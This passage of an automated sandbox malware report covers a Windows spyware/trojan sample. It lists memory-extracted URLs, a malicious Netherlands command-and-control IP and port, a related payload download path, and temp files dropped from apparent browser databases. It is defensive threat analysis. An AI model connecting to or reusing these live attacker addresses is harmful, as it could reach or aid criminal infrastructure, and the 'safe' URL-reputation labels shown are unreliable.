                                                          http://tempuri.org/Endpoint/SetEnvironmentlWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Endpoint/SetEnvironmentResponselWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sajatypeworks.comlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Endpoint/GetUpdateslWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.typography.netDlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.founder.com.cn/cn/cThelWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.galapagosdesign.com/staff/dennis.htmlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.ipify.orgcookies//settinString.RemoveglWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                                                                            		high
                                                                            http://www.galapagosdesign.com/DPleaselWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://185.222.58.229:55615t-lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://tempuri.org/Endpoint/VerifyUpdatelWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/0lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fonts.comlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.sandoll.co.krlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.urwpp.deDPleaselWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.zhongyicts.com.cnlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://185.222.58.229:lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namelWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.sakkal.comlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://ipinfo.io/ip%appdata%lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.fontbureau.comlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymouslWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Endpoint/CheckConnectResponselWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.datacontract.org/2004/07/lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003413000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.ip.sb/geoip%USERPEnvironmentROFILE%lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://api.ip.sblWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/Endpoint/CheckConnectlWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.ecosia.org/newtab/tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Endpoint/SetEnvironlWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.carterandcone.comllWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://ac.ecosia.org/autocomplete?q=tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://185.222.58.229:55615lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://www.founder.com.cn/cnlWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.fontbureau.com/designers/frere-user.htmllWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressinglWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://tempuri.org/Endpoint/GetUpdatesResponselWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.jiyu-kobo.co.jp/lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://tempuri.org/Endpoint/EnvironmentSettingsResponselWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.fontbureau.com/designers8lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/soap/actor/nextlWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public IPs

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                185.222.58.229
                                                                                                                                                		unknownNetherlands
                                                                                                                                                		51447ROOTLAYERNETNLtrue

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                Analysis ID:1567345
                                                                                                                                                Start date and time:2024-12-03 13:26:06 +01:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 5m 19s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:8
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:lWnSA7IyVc.exe
                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                Original Sample Name:3726ee297e39481c17efbe020ef5cfcc.exe
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@4/45@1/1
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 67
                                                                                                                                                • Number of non-executed functions: 17
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                                                                                                                • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • VT rate limit hit for: lWnSA7IyVc.exe

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                07:26:56API Interceptor68x Sleep call for process: lWnSA7IyVc.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                185.222.58.229Qtn_Jan_2023.xlsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                • 185.222.58.229/R2390/csrss00.exe

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                ROOTLAYERNETNL8ZVd2S51fr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.58.241
                                                                                                                                                Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 185.222.57.90
                                                                                                                                                Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 185.222.57.90
                                                                                                                                                9dOKGgFNL2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 45.137.22.126
                                                                                                                                                RFQ List and airflight 2024.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                • 45.137.22.174
                                                                                                                                                Calyciform.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                • 45.137.22.248
                                                                                                                                                I5pvP0CU6M.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 45.137.22.248
                                                                                                                                                gLsenXDHxP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.58.240
                                                                                                                                                DEVIS + FACTURE.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • 45.137.22.126
                                                                                                                                                PZNfhfaj9O.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.58.80

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lWnSA7IyVc.exe.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp42CB.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp42DB.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp42EC.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp42ED.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp42EE.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp42FE.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp42FF.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp4310.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

